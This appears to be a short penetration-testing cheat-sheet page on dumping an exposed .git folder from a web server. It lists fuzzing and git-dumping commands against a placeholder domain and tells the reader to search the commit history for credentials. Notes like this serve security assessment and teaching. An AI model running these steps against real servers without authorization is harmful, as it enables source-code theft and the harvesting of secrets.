githubEdit

Exposed Github Repositories Dumping

Tools: Directory fuzzer tools (Feroxbuster, gobuster, dirbouster, etc...) and GitTools: https://github.com/internetwache/GitTools

Wordlist used: /usr/share/seclists/Discovery/Web-Content/common.txt (Other standard wordlists might NOT detect the .git exposed folder)

Steps:

feroxbuster -u http://DOMAIN.LOCAL -w /usr/share/seclists/Discovery/Web-Content/common.txt
git-dumper.sh http://DOMAIN.LOCAL/.git/ /home/user/Desktop/repo

Then, if we want to check for commits that we might find some sort of credentials and important information, go to the directory where the .git folder is located

/path/to/extractor.sh /home/user/Desktop/repo /home/user/Desktop/repodump

git log (Gets all commits in the repository)

git show COMMIT_NUMBER (See the specific commit in detail)

Last updated